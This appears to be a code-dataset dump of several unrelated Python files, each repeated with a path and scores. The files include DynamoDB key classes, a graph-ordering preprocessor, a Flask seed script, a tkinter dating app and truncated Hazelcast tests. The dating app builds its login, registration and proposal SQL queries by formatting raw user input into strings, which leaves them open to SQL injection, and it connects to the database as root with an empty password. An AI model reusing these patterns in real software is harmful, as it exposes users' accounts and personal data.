raise TypeError(f'Entity names must inherit from {cls.__name__}.') # pragma: no cover # noqa 501
if 'name' in cls.__dict__ and type(cls.__dict__['name']) is str:
return cls.__dict__['name'].upper() + '#'
return cls.__name__.upper() + '#'
class EntityKey(ABC):
"""Abstract base class of table keys."""
def __init__(self, entity_name: Type[EntityName], value: str):
"""Initialize an EntityKey instance.
Args:
entity_name: The entity type name.
value: The key value.
"""
self._prefix = entity_name.to_prefix()
self._value = value
# New must match init + subclasses' init as well.
def __new__(cls, *args: List[Any], **kwargs: Dict[str, Any]) \
-> 'EntityKey':
"""Prevent creating abstract base class."""
if cls is EntityKey:
raise TypeError(f'{EntityKey.__name__} can not be instantiated.') # pragma: no cover # noqa 501
return cast(EntityKey, object.__new__(cls))
def __str__(self) -> str:
"""Get the string representation."""
# Eg. ENTITY#value
return f'{self._prefix}{self._value}'
def __hash__(self) -> int:
"""Get the hash value."""
return hash(str(self))
def __eq__(self, other: Any) -> bool:
"""Compare semantic equality."""
return str(self) == str(other)
@property
def prefix(self) -> str:
"""Get the entity prefix of the key."""
return self._prefix
@property
def value(self) -> Optional[str]:
"""Get the value of the key."""
return self._value
class PartitionKey(EntityKey):
"""Partition key."""
class SortKey(EntityKey):
"""Sort key with a value."""
# Shouldn't inherit from `SortKey` as `PrefixSortKey` shouldn't pass where a
# `SortKey` is required.
class PrefixSortKey(EntityKey):
"""Prefix only sort key to query relations."""
def __init__(self, entity_name: Type[EntityName], value: str = ''):
"""Initialize a PrefixSortKey instance.
Args:
entity_name: The entity type name.
value: Optional prefix value.
"""
super().__init__(entity_name, value)
class PrimaryKey:
"""Primary (composite) key of a DynamoDB item."""
def __init__(self, partition_key: PartitionKey, sort_key: SortKey):
"""Initialize a PrimaryKey instance."""
super().__init__()
self._pk = partition_key
self._sk = sort_key
self._serializer = Serializer()
def __hash__(self) -> int:
return hash(self._tuple)
def __eq__(self, other: object) -> bool:
if isinstance(other, self.__class__):
return self._tuple == other._tuple
else:
return self._tuple == other
@property
def _tuple(self) -> Tuple[str, str]:
return str(self.partition_key), str(self.sort_key)
@property
def partition_key(self) -> PartitionKey: # pragma: no cover
"""Get the partition key."""
return self._pk
@property
def sort_key(self) -> SortKey: # pragma: no cover
"""Get the sort key."""
return self._sk
def serialize(self, global_index: GlobalIndex) -> Dict[str, Any]:
"""Serialize the primary key to a DynamoDB item.
Args:
global_index: The global index where this key will be used.
Returns:
The serialized key.
"""
pk_name = global_index.partition_key
sk_name = global_index.sort_key
item = {
pk_name: str(self.partition_key),
sk_name: str(self.sort_key)
}
return self._serializer.serialize_dict(item) | dokklib_db_extended/keys.py | from abc import ABC
from typing import Any, Dict, List, Optional, Tuple, Type, Union, cast
from dokklib_db_extended.index import GlobalIndex
from dokklib_db_extended.serializer import Serializer
AnySortKey = Union['SortKey', 'PrefixSortKey']
class EntityName(ABC):
"""Abstract base class of entity names.
Applications must define their entities by inheriting from this class.
Eg. in "app/entities.py":
```python
import dokklib_db_extended as db
class User(db.EntityName):
pass
class Product(db.EntityName):
pass
...
```
"""
def __new__(cls) -> 'EntityName': # pragma: no cover
"""Prevent creating abstract base class."""
raise TypeError(f'{cls.__name__} can not be instantiated.')
@classmethod
def to_prefix(cls) -> str:
"""Convert class name to key prefix.
Returns:
The key prefix. Eg. if class name is 'User', then the prefix is
'USER#'.
"""
if cls is EntityName:
raise TypeError(f'Entity names must inherit from {cls.__name__}.') # pragma: no cover # noqa 501
if 'name' in cls.__dict__ and type(cls.__dict__['name']) is str:
return cls.__dict__['name'].upper() + '#'
return cls.__name__.upper() + '#'
class EntityKey(ABC):
"""Abstract base class of table keys."""
def __init__(self, entity_name: Type[EntityName], value: str):
"""Initialize an EntityKey instance.
Args:
entity_name: The entity type name.
value: The key value.
"""
self._prefix = entity_name.to_prefix()
self._value = value
# New must match init + subclasses' init as well.
def __new__(cls, *args: List[Any], **kwargs: Dict[str, Any]) \
-> 'EntityKey':
"""Prevent creating abstract base class."""
if cls is EntityKey:
raise TypeError(f'{EntityKey.__name__} can not be instantiated.') # pragma: no cover # noqa 501
return cast(EntityKey, object.__new__(cls))
def __str__(self) -> str:
"""Get the string representation."""
# Eg. ENTITY#value
return f'{self._prefix}{self._value}'
def __hash__(self) -> int:
"""Get the hash value."""
return hash(str(self))
def __eq__(self, other: Any) -> bool:
"""Compare semantic equality."""
return str(self) == str(other)
@property
def prefix(self) -> str:
"""Get the entity prefix of the key."""
return self._prefix
@property
def value(self) -> Optional[str]:
"""Get the value of the key."""
return self._value
class PartitionKey(EntityKey):
"""Partition key."""
class SortKey(EntityKey):
"""Sort key with a value."""
# Shouldn't inherit from `SortKey` as `PrefixSortKey` shouldn't pass where a
# `SortKey` is required.
class PrefixSortKey(EntityKey):
"""Prefix only sort key to query relations."""
def __init__(self, entity_name: Type[EntityName], value: str = ''):
"""Initialize a PrefixSortKey instance.
Args:
entity_name: The entity type name.
value: Optional prefix value.
"""
super().__init__(entity_name, value)
class PrimaryKey:
"""Primary (composite) key of a DynamoDB item."""
def __init__(self, partition_key: PartitionKey, sort_key: SortKey):
"""Initialize a PrimaryKey instance."""
super().__init__()
self._pk = partition_key
self._sk = sort_key
self._serializer = Serializer()
def __hash__(self) -> int:
return hash(self._tuple)
def __eq__(self, other: object) -> bool:
if isinstance(other, self.__class__):
return self._tuple == other._tuple
else:
return self._tuple == other
@property
def _tuple(self) -> Tuple[str, str]:
return str(self.partition_key), str(self.sort_key)
@property
def partition_key(self) -> PartitionKey: # pragma: no cover
"""Get the partition key."""
return self._pk
@property
def sort_key(self) -> SortKey: # pragma: no cover
"""Get the sort key."""
return self._sk
def serialize(self, global_index: GlobalIndex) -> Dict[str, Any]:
"""Serialize the primary key to a DynamoDB item.
Args:
global_index: The global index where this key will be used.
Returns:
The serialized key.
"""
pk_name = global_index.partition_key
sk_name = global_index.sort_key
item = {
pk_name: str(self.partition_key),
sk_name: str(self.sort_key)
}
return self._serializer.serialize_dict(item) | 0.952563 | 0.417509 |
from Queue import Queue
from domain import DomainUtils
from domain.ErrorTypes import ErrorTypes
from pipeline_generator.preprocessing.task import SpecialCaseHandler
# No need to keep data/state, so I did not make it a class..
# This will be safe for multi-thread use as well~
# Improve this...
def determine_generation_order(dependents_info, requireds_info, waiting_queue, special_edges):
error_code = ErrorTypes.NO_ERROR
if(special_edges is not None):
# Pass waiting queue in case any special cases needs to update it...
SpecialCaseHandler.update_dependents_and_requireds_for_special_cases(dependents_info, requireds_info, special_edges)
generation_order=[]
added_nodes=set()
# At this point, waiting queue has data-source and ModelLoad nodes.
while(not waiting_queue.empty()):
cur_node=waiting_queue.get()
if(cur_node not in added_nodes):
if((cur_node not in requireds_info) or (not bool(requireds_info[cur_node]))):
generation_order.append(cur_node)
added_nodes.add(cur_node)
__safe_delete(requireds_info, cur_node)
if(cur_node in dependents_info):
for dependent in dependents_info[cur_node]:
requireds_info[dependent].remove(cur_node)
waiting_queue.put(dependent)
__safe_delete(dependents_info, cur_node)
if(bool(requireds_info)):
# There must be a cycle if required_info still has elements at this moment
error_code = ErrorTypes.CYCLE_IN_GRAPH_ERROR
if(not bool(generation_order)):
error_code=ErrorTypes.EMPTY_GRAPH_ERROR
return generation_order, error_code
def preprocess_graph(graph):
dependents_info = {}
requireds_info = {}
waiting_queue = Queue()
for edge_id in graph["edges"]:
# Assuming directed edges such that first node is the source and the second node is the target.
node_ids = edge_id.split("-")
source_node_family = graph["nodes"][node_ids[0]]["family"]
__add_dependents_info(node_ids[0], node_ids[1], dependents_info)
__add_requireds_info(node_ids[1], node_ids[0], requireds_info)
# Nodes without incoming edges (requireds) will be processed first...
if(not DomainUtils.requires_incoming_edge(source_node_family)):
waiting_queue.put(node_ids[0])
return dependents_info, requireds_info, waiting_queue
def __add_dependents_info(current_node_id, dependent_node_id, dependents_info):
if (current_node_id not in dependents_info):
dependents_info[current_node_id] = set()
dependents_info[current_node_id].add(dependent_node_id)
def __add_requireds_info(current_node_id, required_node_id, requireds_info):
if (current_node_id not in requireds_info):
requireds_info[current_node_id] = set()
requireds_info[current_node_id].add(required_node_id)
def __safe_delete(dict, val):
if(val in dict):
del dict[val] | arakat-core/pipeline_generator/preprocessing/task/TaskPreprocessor.py | from Queue import Queue
from domain import DomainUtils
from domain.ErrorTypes import ErrorTypes
from pipeline_generator.preprocessing.task import SpecialCaseHandler
# No need to keep data/state, so I did not make it a class..
# This will be safe for multi-thread use as well~
# Improve this...
def determine_generation_order(dependents_info, requireds_info, waiting_queue, special_edges):
error_code = ErrorTypes.NO_ERROR
if(special_edges is not None):
# Pass waiting queue in case any special cases needs to update it...
SpecialCaseHandler.update_dependents_and_requireds_for_special_cases(dependents_info, requireds_info, special_edges)
generation_order=[]
added_nodes=set()
# At this point, waiting queue has data-source and ModelLoad nodes.
while(not waiting_queue.empty()):
cur_node=waiting_queue.get()
if(cur_node not in added_nodes):
if((cur_node not in requireds_info) or (not bool(requireds_info[cur_node]))):
generation_order.append(cur_node)
added_nodes.add(cur_node)
__safe_delete(requireds_info, cur_node)
if(cur_node in dependents_info):
for dependent in dependents_info[cur_node]:
requireds_info[dependent].remove(cur_node)
waiting_queue.put(dependent)
__safe_delete(dependents_info, cur_node)
if(bool(requireds_info)):
# There must be a cycle if required_info still has elements at this moment
error_code = ErrorTypes.CYCLE_IN_GRAPH_ERROR
if(not bool(generation_order)):
error_code=ErrorTypes.EMPTY_GRAPH_ERROR
return generation_order, error_code
def preprocess_graph(graph):
dependents_info = {}
requireds_info = {}
waiting_queue = Queue()
for edge_id in graph["edges"]:
# Assuming directed edges such that first node is the source and the second node is the target.
node_ids = edge_id.split("-")
source_node_family = graph["nodes"][node_ids[0]]["family"]
__add_dependents_info(node_ids[0], node_ids[1], dependents_info)
__add_requireds_info(node_ids[1], node_ids[0], requireds_info)
# Nodes without incoming edges (requireds) will be processed first...
if(not DomainUtils.requires_incoming_edge(source_node_family)):
waiting_queue.put(node_ids[0])
return dependents_info, requireds_info, waiting_queue
def __add_dependents_info(current_node_id, dependent_node_id, dependents_info):
if (current_node_id not in dependents_info):
dependents_info[current_node_id] = set()
dependents_info[current_node_id].add(dependent_node_id)
def __add_requireds_info(current_node_id, required_node_id, requireds_info):
if (current_node_id not in requireds_info):
requireds_info[current_node_id] = set()
requireds_info[current_node_id].add(required_node_id)
def __safe_delete(dict, val):
if(val in dict):
del dict[val] | 0.468304 | 0.18743 |
from app import db
from models import Community, Posts, Comments, User
db.create_all()
u = User(username="ben", password="<PASSWORD>")
c = Community(name="powerlifting", password=None, founder=u, FAQ=None, description=None)
post = Posts("How to Hook Grip with <NAME>",
"This is a video on how to hook grip with mark robb, https://www.youtube.com/watch?v=drGcGdSMeOg",
author=u,
community=c)
comment = Comments("Testing the new commenting feature!",
author=u,
post=post)
db.session.add_all([u, c, post, comment])
c = Community(name="Programming", password=None, founder=u, FAQ=None, description=None)
post = Posts("Rubber Ducky Code -- Intro to Flask",
"An intro to the flask microframework, made for those just finished with Learn Python the \
hard way and looking to get into web developement:: www.rubberduckycode.com",
author = u,
community = c)
post2 = Posts("Project Euler Solutions made in python",
"Project euler solutions made in python can be found here https://github.com/bendominguez011/Project-Euler-Solutions",
author=u,
community=c)
comment1 = Comments("Testing the new commenting feature!",
author=u,
post=post)
comment2 = Comments("Testing the new commenting feature!",
author=u,
post=post2)
db.session.add_all([c, post, post2, comment1, comment2])
c = Community("Anouncements",
password=None,
founder=u,
FAQ=None,
description=None)
post = Posts("Upcoming updates", "New updates soon to come:\
A Voting system, where you can thumb's up/thumb's down or dislike/like, dont know which yet.\n\
Authenticating with google, so that you could sign in easily through your google account, however this update may be delayed.\n\
Updated templating. I know the site currently looks terrible, but I plan on adding some more Javascript once I become more familiar with the language.\n",
author = u, community = c)
db.session.add_all([post, c])
db.session.commit() | db_create.py | from app import db
from models import Community, Posts, Comments, User
db.create_all()
u = User(username="ben", password="<PASSWORD>")
c = Community(name="powerlifting", password=None, founder=u, FAQ=None, description=None)
post = Posts("How to Hook Grip with <NAME>",
"This is a video on how to hook grip with mark robb, https://www.youtube.com/watch?v=drGcGdSMeOg",
author=u,
community=c)
comment = Comments("Testing the new commenting feature!",
author=u,
post=post)
db.session.add_all([u, c, post, comment])
c = Community(name="Programming", password=None, founder=u, FAQ=None, description=None)
post = Posts("Rubber Ducky Code -- Intro to Flask",
"An intro to the flask microframework, made for those just finished with Learn Python the \
hard way and looking to get into web developement:: www.rubberduckycode.com",
author = u,
community = c)
post2 = Posts("Project Euler Solutions made in python",
"Project euler solutions made in python can be found here https://github.com/bendominguez011/Project-Euler-Solutions",
author=u,
community=c)
comment1 = Comments("Testing the new commenting feature!",
author=u,
post=post)
comment2 = Comments("Testing the new commenting feature!",
author=u,
post=post2)
db.session.add_all([c, post, post2, comment1, comment2])
c = Community("Anouncements",
password=None,
founder=u,
FAQ=None,
description=None)
post = Posts("Upcoming updates", "New updates soon to come:\
A Voting system, where you can thumb's up/thumb's down or dislike/like, dont know which yet.\n\
Authenticating with google, so that you could sign in easily through your google account, however this update may be delayed.\n\
Updated templating. I know the site currently looks terrible, but I plan on adding some more Javascript once I become more familiar with the language.\n",
author = u, community = c)
db.session.add_all([post, c])
db.session.commit() | 0.431464 | 0.118487 |
from tkinter import *
import mysql.connector
class Tinder:
def __init__(self):
()#database connection
self.conn=mysql.connector.connect(host="localhost", user="root", password="", database="tinder")
self.mycursor=self.conn.cursor()
self.root=Tk()
self.root.title("TINDER")
self.root.minsize(600, 400)
self.root.maxsize(600, 400)
self.destroyWindow()
Label(text="Already a member!!!Log In Here!", fg="green").grid(row=0, column=0)
Label(text="Enter Email").grid(row=1,column=0)
self.emailInput=Entry()
self.emailInput.grid(row=1,column=1)
Label(text="Enter Password").grid(row=2,column=0)
self.passwordInput=Entry()
self.passwordInput.grid(row=2,column=1)
Button(text="Login", command=lambda : self.login()).grid(row=3,column=0)
self.message=Label(text="", fg="red")
self.message.grid(row=4,column=0)
Label(text="Not a member?Register here!", fg="green").grid(row=5,column=0)
Button(text="Register Here", command=lambda : self.launchRegWindow()).grid(row=6,column=0)
self.root.mainloop()
def login(self):
self.mycursor.execute("""SELECT * FROM `user` WHERE `email` LIKE '{}' AND `password` LIKE '{}'""".format(self.emailInput.get(),self.passwordInput.get()))
response = self.mycursor.fetchall()
if len(response)>0:
self.message.configure(text="Welcome User")
Label(text="For user menu Click Here!!", fg="blue").grid(row=8,column=0)
Button(text="User Menu", command=lambda : self.launchUserMenu()).grid(row=9,column=0)
Label(text="To Log Out Click Here!!", fg="blue").grid(row=10, column=0)
Button(text="LOG OUT", command=lambda : self.launchLogOut()).grid(row=11, column=0)
self.current_user_id = response[0][0]
else:
self.message.configure(text="Incorrect email/password")
def launchRegWindow(self):
self.destroyWindow()
Label(text="Register").grid(row=0,column=0)
self.conn = mysql.connector.connect(host="localhost", user="root", password="", database="tinder")
self.mycursor = self.conn.cursor()
Label(text="Full Name").grid(row=1,column=0)
self.nameReg = Entry()
self.nameReg.grid(row=1,column=1)
Label(text="Provide Email").grid(row=2,column=0)
self.emailReg = Entry()
self.emailReg.grid(row=2,column=1)
Label(text="Provide Password").grid(row=3,column=0)
self.passwordReg = Entry()
self.passwordReg.grid(row=3,column=1)
Label(text="Provide Gender").grid(row=4,column=0)
self.genderReg = Entry()
self.genderReg.grid(row=4,column=1)
Label(text="Provide Age").grid(row=5,column=0)
self.ageReg = Entry()
self.ageReg.grid(row=5,column=1)
Label(text="Provide City").grid(row=6,column=0)
self.cityReg = Entry()
self.cityReg.grid(row=6,column=1)
Label(text="Provide hobbies").grid(row=7,column=0)
self.hobbiesReg = Entry()
self.hobbiesReg.grid(row=7,column=1)
Button(self.root, text="Register", command=lambda : self.register()).grid(row=8,column=0)
self.message = Label(text="", fg="red")
self.message.grid(row=9,column=0)
self.root.mainloop()
def register(self):
self.mycursor.execute("""INSERT INTO `user` (`user_id`, `name`, `email`, `password`, `gender`, `age`, `city`, `hobbies`) VALUES
(NULL, '{}', '{}', '{}', '{}', '{}', '{}', '{}')""".format(self.nameReg.get(),
self.emailReg.get(),
self.passwordReg.get(),
self.genderReg.get(),
self.ageReg.get(),
self.cityReg.get(),
self.hobbiesReg.get()))
self.conn.commit()
self.message.configure(text="Registration Successful")
Label(text="To Log Out Click Here!!", fg="blue").grid(row=10, column=0)
Button(text="LOG OUT", command=lambda: self.launchLogOut()).grid(row=11, column=0)
def launchUserMenu(self):
self.destroyWindow()
Label(text="User Menu").grid(row=0, column=0)
Label(text="To view all users Click Here!!", fg="blue").grid(row=1, column=0)
Button(text="View Users", command=lambda : self.launchViewUsers()).grid(row=2, column=0)
Label(text="To view whom you have proposed Click Here!!", fg="blue").grid(row=3, column=0)
Button(text="Proposed Users", command=lambda : self.launchProposedUsers()).grid(row=4, column=0)
Label(text="To view who have proposed you Click Here!!", fg="blue").grid(row=5, column=0)
Button(text="Proposals", command=lambda : self.launchProposals()).grid(row=6, column=0)
Label(text="To view all matches Click Here!!", fg="blue").grid(row=7, column=0)
Button(text="Matches", command=lambda : self.launchMatches()).grid(row=8, column=0)
Label(text="To Log Out Click Here!!", fg="blue").grid(row=9, column=0)
Button(text="LOG OUT", command=lambda: self.launchLogOut()).grid(row=10, column=0)
self.sb1 = Scrollbar()
self.sb1.grid(row=0, column=1, rowspan=5)
self.list1 = Listbox(height=7, width=40)
self.list1.grid(row=0, column=2, rowspan=6, columnspan=4)
self.list1.configure(yscrollcommand=self.sb1.set)
self.sb1.configure(command=self.list1.yview)
self.entry_value = StringVar()
def launchViewUsers(self, i=0):
self.list1.delete(0, END)
self.view_users()
for i in self.all_users_list:
self.list1.insert(END, i)
Label(text="enter the id of the user whom you would like to propose:", fg="blue").grid(row=12,column=0)
self.juliet_id = Entry()
self.juliet_id.grid(row=13, column=0)
Button(text="Propose", command=lambda: self.propose()).grid(row=14, column=0)
def propose(self):
self.mycursor.execute(
"""INSERT INTO `proposals` (`proposal_id`, `romeo_id`, `juliet_id`) VALUES (NULL, '{}', '{}')"""
.format(self.current_user_id, self.juliet_id.get()))
self.conn.commit()
Label(text="Proposal sent successfully! Fingers crossed!", fg="green").grid(row=15,column=0)
self.launchViewUsers()
def view_users(self):
self.mycursor.execute(
"""SELECT `user_id`,`name`,`gender`,`age`,`city`,`hobbies` FROM `user` WHERE `user_id` NOT LIKE '{}'""".format(
self.current_user_id))
self.all_users_list = self.mycursor.fetchall()
def launchProposedUsers(self):
self.list1.delete(0, END)
self.view_proposed()
for i in self.proposed_user_list:
self.list1.insert(END, i)
def view_proposed(self):
self.mycursor.execute(
"""SELECT u.`name`,u.`gender`,u.`city`,u.`age`,u.`hobbies` FROM `proposals` p JOIN `user` u ON p.`juliet_id` = u.`user_id`
WHERE p.`romeo_id` LIKE '{}'""".format(self.current_user_id))
self.proposed_user_list = self.mycursor.fetchall()
def launchProposals(self):
self.list1.delete(0, END)
self.view_requests()
for i in self.request_user_list:
self.list1.insert(END, i)
def view_requests(self):
self.mycursor.execute(
"""SELECT u.`name`,u.`gender`,u.`city`,u.`age`,u.`hobbies` FROM `proposals` p JOIN `user` u ON p.`romeo_id` = u.`user_id`
WHERE p.`juliet_id` LIKE '{}'""".format(self.current_user_id))
self.request_user_list = self.mycursor.fetchall()
def launchMatches(self):
self.list1.delete(0, END)
self.view_matches()
for i in self.matched_user:
self.list1.insert(END, i)
def view_matches(self):
# tripple subquery
self.mycursor.execute(
"""SELECT `name`,`gender`,`age`,`city`,`hobbies` FROM `user` WHERE `user_id` IN
(SELECT `juliet_id` FROM `proposals` WHERE `romeo_id` LIKE '{}' AND `juliet_id` IN (SELECT `romeo_id` FROM `proposals`
WHERE `juliet_id` LIKE '{}'))""".format(self.current_user_id, self.current_user_id))
self.matched_user = self.mycursor.fetchall()
def launchLogOut(self):
self.destroyWindow()
self.current_user_id = 0
Label(text="!!Logged out successfully!!", fg="red").grid(row=0,column=0)
Label(text="Already a member!!!Log In Here!", fg="green").grid(row=1, column=0)
Label(text="Enter Email").grid(row=2, column=0)
self.emailInput = Entry()
self.emailInput.grid(row=2, column=1)
Label(text="Enter Password").grid(row=3, column=0)
self.passwordInput = Entry()
self.passwordInput.grid(row=3, column=1)
Button(text="Login", command=lambda: self.login()).grid(row=4, column=0)
self.message = Label(text="", fg="red")
self.message.grid(row=5, column=0)
Label(text="Not a member?Register here!", fg="green").grid(row=6, column=0)
Button(text="Register Here", command=lambda: self.launchRegWindow()).grid(row=7, column=0)
self.root.mainloop()
def destroyWindow(self):
for i in self.root.grid_slaves():
i.destroy()
obj=Tinder() | Python3 GUI code.py | from tkinter import *
import mysql.connector
class Tinder:
def __init__(self):
()#database connection
self.conn=mysql.connector.connect(host="localhost", user="root", password="", database="tinder")
self.mycursor=self.conn.cursor()
self.root=Tk()
self.root.title("TINDER")
self.root.minsize(600, 400)
self.root.maxsize(600, 400)
self.destroyWindow()
Label(text="Already a member!!!Log In Here!", fg="green").grid(row=0, column=0)
Label(text="Enter Email").grid(row=1,column=0)
self.emailInput=Entry()
self.emailInput.grid(row=1,column=1)
Label(text="Enter Password").grid(row=2,column=0)
self.passwordInput=Entry()
self.passwordInput.grid(row=2,column=1)
Button(text="Login", command=lambda : self.login()).grid(row=3,column=0)
self.message=Label(text="", fg="red")
self.message.grid(row=4,column=0)
Label(text="Not a member?Register here!", fg="green").grid(row=5,column=0)
Button(text="Register Here", command=lambda : self.launchRegWindow()).grid(row=6,column=0)
self.root.mainloop()
def login(self):
self.mycursor.execute("""SELECT * FROM `user` WHERE `email` LIKE '{}' AND `password` LIKE '{}'""".format(self.emailInput.get(),self.passwordInput.get()))
response = self.mycursor.fetchall()
if len(response)>0:
self.message.configure(text="Welcome User")
Label(text="For user menu Click Here!!", fg="blue").grid(row=8,column=0)
Button(text="User Menu", command=lambda : self.launchUserMenu()).grid(row=9,column=0)
Label(text="To Log Out Click Here!!", fg="blue").grid(row=10, column=0)
Button(text="LOG OUT", command=lambda : self.launchLogOut()).grid(row=11, column=0)
self.current_user_id = response[0][0]
else:
self.message.configure(text="Incorrect email/password")
def launchRegWindow(self):
self.destroyWindow()
Label(text="Register").grid(row=0,column=0)
self.conn = mysql.connector.connect(host="localhost", user="root", password="", database="tinder")
self.mycursor = self.conn.cursor()
Label(text="Full Name").grid(row=1,column=0)
self.nameReg = Entry()
self.nameReg.grid(row=1,column=1)
Label(text="Provide Email").grid(row=2,column=0)
self.emailReg = Entry()
self.emailReg.grid(row=2,column=1)
Label(text="Provide Password").grid(row=3,column=0)
self.passwordReg = Entry()
self.passwordReg.grid(row=3,column=1)
Label(text="Provide Gender").grid(row=4,column=0)
self.genderReg = Entry()
self.genderReg.grid(row=4,column=1)
Label(text="Provide Age").grid(row=5,column=0)
self.ageReg = Entry()
self.ageReg.grid(row=5,column=1)
Label(text="Provide City").grid(row=6,column=0)
self.cityReg = Entry()
self.cityReg.grid(row=6,column=1)
Label(text="Provide hobbies").grid(row=7,column=0)
self.hobbiesReg = Entry()
self.hobbiesReg.grid(row=7,column=1)
Button(self.root, text="Register", command=lambda : self.register()).grid(row=8,column=0)
self.message = Label(text="", fg="red")
self.message.grid(row=9,column=0)
self.root.mainloop()
def register(self):
self.mycursor.execute("""INSERT INTO `user` (`user_id`, `name`, `email`, `password`, `gender`, `age`, `city`, `hobbies`) VALUES
(NULL, '{}', '{}', '{}', '{}', '{}', '{}', '{}')""".format(self.nameReg.get(),
self.emailReg.get(),
self.passwordReg.get(),
self.genderReg.get(),
self.ageReg.get(),
self.cityReg.get(),
self.hobbiesReg.get()))
self.conn.commit()
self.message.configure(text="Registration Successful")
Label(text="To Log Out Click Here!!", fg="blue").grid(row=10, column=0)
Button(text="LOG OUT", command=lambda: self.launchLogOut()).grid(row=11, column=0)
def launchUserMenu(self):
self.destroyWindow()
Label(text="User Menu").grid(row=0, column=0)
Label(text="To view all users Click Here!!", fg="blue").grid(row=1, column=0)
Button(text="View Users", command=lambda : self.launchViewUsers()).grid(row=2, column=0)
Label(text="To view whom you have proposed Click Here!!", fg="blue").grid(row=3, column=0)
Button(text="Proposed Users", command=lambda : self.launchProposedUsers()).grid(row=4, column=0)
Label(text="To view who have proposed you Click Here!!", fg="blue").grid(row=5, column=0)
Button(text="Proposals", command=lambda : self.launchProposals()).grid(row=6, column=0)
Label(text="To view all matches Click Here!!", fg="blue").grid(row=7, column=0)
Button(text="Matches", command=lambda : self.launchMatches()).grid(row=8, column=0)
Label(text="To Log Out Click Here!!", fg="blue").grid(row=9, column=0)
Button(text="LOG OUT", command=lambda: self.launchLogOut()).grid(row=10, column=0)
self.sb1 = Scrollbar()
self.sb1.grid(row=0, column=1, rowspan=5)
self.list1 = Listbox(height=7, width=40)
self.list1.grid(row=0, column=2, rowspan=6, columnspan=4)
self.list1.configure(yscrollcommand=self.sb1.set)
self.sb1.configure(command=self.list1.yview)
self.entry_value = StringVar()
def launchViewUsers(self, i=0):
self.list1.delete(0, END)
self.view_users()
for i in self.all_users_list:
self.list1.insert(END, i)
Label(text="enter the id of the user whom you would like to propose:", fg="blue").grid(row=12,column=0)
self.juliet_id = Entry()
self.juliet_id.grid(row=13, column=0)
Button(text="Propose", command=lambda: self.propose()).grid(row=14, column=0)
def propose(self):
self.mycursor.execute(
"""INSERT INTO `proposals` (`proposal_id`, `romeo_id`, `juliet_id`) VALUES (NULL, '{}', '{}')"""
.format(self.current_user_id, self.juliet_id.get()))
self.conn.commit()
Label(text="Proposal sent successfully! Fingers crossed!", fg="green").grid(row=15,column=0)
self.launchViewUsers()
def view_users(self):
self.mycursor.execute(
"""SELECT `user_id`,`name`,`gender`,`age`,`city`,`hobbies` FROM `user` WHERE `user_id` NOT LIKE '{}'""".format(
self.current_user_id))
self.all_users_list = self.mycursor.fetchall()
def launchProposedUsers(self):
self.list1.delete(0, END)
self.view_proposed()
for i in self.proposed_user_list:
self.list1.insert(END, i)
def view_proposed(self):
self.mycursor.execute(
"""SELECT u.`name`,u.`gender`,u.`city`,u.`age`,u.`hobbies` FROM `proposals` p JOIN `user` u ON p.`juliet_id` = u.`user_id`
WHERE p.`romeo_id` LIKE '{}'""".format(self.current_user_id))
self.proposed_user_list = self.mycursor.fetchall()
def launchProposals(self):
self.list1.delete(0, END)
self.view_requests()
for i in self.request_user_list:
self.list1.insert(END, i)
def view_requests(self):
self.mycursor.execute(
"""SELECT u.`name`,u.`gender`,u.`city`,u.`age`,u.`hobbies` FROM `proposals` p JOIN `user` u ON p.`romeo_id` = u.`user_id`
WHERE p.`juliet_id` LIKE '{}'""".format(self.current_user_id))
self.request_user_list = self.mycursor.fetchall()
def launchMatches(self):
self.list1.delete(0, END)
self.view_matches()
for i in self.matched_user:
self.list1.insert(END, i)
def view_matches(self):
# tripple subquery
self.mycursor.execute(
"""SELECT `name`,`gender`,`age`,`city`,`hobbies` FROM `user` WHERE `user_id` IN
(SELECT `juliet_id` FROM `proposals` WHERE `romeo_id` LIKE '{}' AND `juliet_id` IN (SELECT `romeo_id` FROM `proposals`
WHERE `juliet_id` LIKE '{}'))""".format(self.current_user_id, self.current_user_id))
self.matched_user = self.mycursor.fetchall()
def launchLogOut(self):
self.destroyWindow()
self.current_user_id = 0
Label(text="!!Logged out successfully!!", fg="red").grid(row=0,column=0)
Label(text="Already a member!!!Log In Here!", fg="green").grid(row=1, column=0)
Label(text="Enter Email").grid(row=2, column=0)
self.emailInput = Entry()
self.emailInput.grid(row=2, column=1)
Label(text="Enter Password").grid(row=3, column=0)
self.passwordInput = Entry()
self.passwordInput.grid(row=3, column=1)
Button(text="Login", command=lambda: self.login()).grid(row=4, column=0)
self.message = Label(text="", fg="red")
self.message.grid(row=5, column=0)
Label(text="Not a member?Register here!", fg="green").grid(row=6, column=0)
Button(text="Register Here", command=lambda: self.launchRegWindow()).grid(row=7, column=0)
self.root.mainloop()
def destroyWindow(self):
for i in self.root.grid_slaves():
i.destroy()
obj=Tinder() | 0.394667 | 0.117066 |
from unittest import TestCase
from hazelcast import six
from hazelcast.core import Address
from hazelcast.connection import DefaultAddressProvider
class DefaultAddressProviderTest(TestCase):
def test_load_addresses(self):
initial_list = ["192.168.0.1:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("192.168.0.1", 5701)])
six.assertCountEqual(self, secondaries, [])
def test_load_addresses_with_multiple_addresses(self):
initial_list = ["192.168.0.1:5701", "192.168.0.1:5702", "192.168.0.2:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(
self,
primaries,
[
Address("192.168.0.1", 5701),
Address("192.168.0.1", 5702),
Address("192.168.0.2", 5701),
],
)
six.assertCountEqual(self, secondaries, [])
# we deal with duplicate addresses in the ConnectionManager#_get_possible_addresses
def test_load_addresses_with_duplicate_addresses(self):
initial_list = ["192.168.0.1:5701", "192.168.0.1:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(
self, primaries, [Address("192.168.0.1", 5701), Address("192.168.0.1", 5701)]
)
six.assertCountEqual(self, secondaries, [])
def test_load_addresses_with_empty_addresses(self):
initial_list = []
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("127.0.0.1", 5701)])
six.assertCountEqual(
self, secondaries, [Address("127.0.0.1", 5702), Address("127.0.0.1", 5703)]
)
def test_load_addresses_without_port(self):
initial_list = ["192.168.0.1"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("192.168.0.1", 5701)])
six.assertCountEqual(
self, secondaries, [Address("192.168.0.1", 5702), Address("192.168.0.1", 5703)]
)
def test_translate(self):
